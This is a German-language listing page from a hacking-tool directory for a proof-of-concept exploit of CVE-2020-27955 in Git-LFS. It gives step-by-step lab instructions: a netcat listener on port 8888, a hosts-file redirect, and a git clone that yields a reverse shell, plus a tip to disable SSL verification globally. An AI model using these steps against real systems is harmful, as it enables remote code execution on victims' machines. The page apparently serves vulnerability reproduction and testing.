Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-27955 — Proof-of-Concept-Exploit für CVE-2020-27955 in Git-LFS, das Remote-Codeausführung über einen manipulierten git clone-Vorgang demonstriert, um eine Reverse Shell zu erhalten. | Kitploit
Tools/GitHubGitHub/z50913/cve-2020-27955
Payload-GenerierungSchwachstellenanalyseExploitationLaterale BewegungPenetrationstestsCommand and Control
GitHubz50913/cve-2020-27955

CVE-2020-27955

Proof-of-Concept-Exploit für CVE-2020-27955 in Git-LFS, das Remote-Codeausführung über einen manipulierten git clone-Vorgang demonstriert, um eine Reverse Shell zu erhalten.

Repository anzeigen
4vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Reproduktion der Schwachstelle CVE-2020-27955

  1. Auf dem Windows-Rechner die verwundbare Version von Git-LFS herunterladen.

Download-Link: https://github.com/git-for-windows/git/releases/tag/v2.29.2.windows.1

  1. Auf dem Windows-Rechner installieren und die folgenden Informationen zur Hosts-Datei hinzufügen. 10.1.1.5 ist der Host, auf dem nc Port 8888 abhört (kann bei Bedarf ersetzt werden).

10.1.1.5 abcall.xyz

  1. Auf dem Host 10.1.1.5 nc auf Port 8888 lauschen lassen.

┌──(root㉿hostname)-[~]

└─# nc

Cmd line: -l -p 8888

  1. Auf dem Windows-Rechner in der Eingabeaufforderung (cmd) eingeben.

git clone https://github.com/z50913/CVE-2020-27955.git

  1. Auf 10.1.1.5 erhält man die Shell der Windows-Eingabeaufforderung.

Sonstiges

Falls ein SSL-Zertifikatsproblem gemeldet wird, kann man zuerst den folgenden Befehl eingeben, um die SSL-Validierung zu deaktivieren, und dann erneut klonen.

git config --global http.sslverify false

Tool herunterladen